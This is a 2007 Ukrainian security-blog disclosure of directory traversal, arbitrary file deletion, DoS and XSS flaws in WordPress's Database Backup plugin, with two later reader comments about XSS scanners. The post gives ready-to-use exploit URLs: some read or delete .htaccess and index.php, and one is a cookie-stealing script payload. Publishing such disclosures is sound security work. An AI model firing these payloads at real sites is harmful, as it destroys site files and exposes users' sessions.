Directory traversal, Arbitrary file deletion, DoS та XSS в WordPress
23:49 27.12.2007В червні, 05.06.2007, я знайшов Directory traversal, Arbitrary file deletion та Denial of Service уразливості в WordPress. А 28.10.2007 ще додатково Cross-Site Scripting уразливість. Дірки в файлі wp-db-backup.php - в плагіні WordPress Database Backup.
В минулому році була знайдена Directory traversal уразливість в плагіні WordPress WP-DB Backup. Котра була виправлена в WP 2.0.4.
Directory Traversal:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
Як я виявив даний плагін також вразливий до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше стосовно іншої дірки в цьому движку - Local file include та Directory traversal в WordPress.
Directory Traversal:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
Ця дірка також вже була виправлена в WP 2.0.4. Тому вразлива WordPress 2.0.3 і попередні версії. Окрім Directory traversal, я ще виявив інші уразливості.
Також можливо видалити довільний файл на сервері (на котрий має права даний користувач). Тому що плагін WordPress Database Backup видаляє файли, до котрих відбувається запит - причому незалежно від того, чи скачає користувач файл, чи ні, в будь-якому випадку файл видаляється.
Arbitrary file deletion:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
Це також може бути використано для проведення DoS-атаки. При видаленні index.php сайт перестане нормально функціонувати.
DoS:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php
Вразлива WordPress 2.0.3 і попередні версії.
XSS:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).
Середа, 22:35 24.02.2010
Що до мене, я користуюся таким сервiсом для пошуку XSS уразливістей:
xss-scanner.com
Субота, 23:31 27.02.2010
Катюха
Якщо тобі вистачає цього сервіса, то, будь ласка, користуйся. Але сильно на нього не надійся .
Тому що, по-перше, всі сканери недостатньо ефективні (навіть стосовно пошуку XSS уразливостей). Що безкоштовні, що комерційні сканери - жоден з них не знайде усіх уразливостей, як це може зробити професіонал з веб безпеки. Зокрема, я не поважаю жодних сканерів і регулярно публікую інформацію про дірки на сайтах секюріті компаній, в тому числі й виробників секюріті сканерів.
По-друге, даний сервіс призначений лише для пошуку XSS уразливостей. А існує ще чимало інших класів уразливостей, на наявність яких також потрібно перевіряти сайти. Так що ефективність даного сканеру дуже мала, що в порівнянні з іншими повнофункціональними сканерами, що в порівнянні з ручною перевіркою безпеки.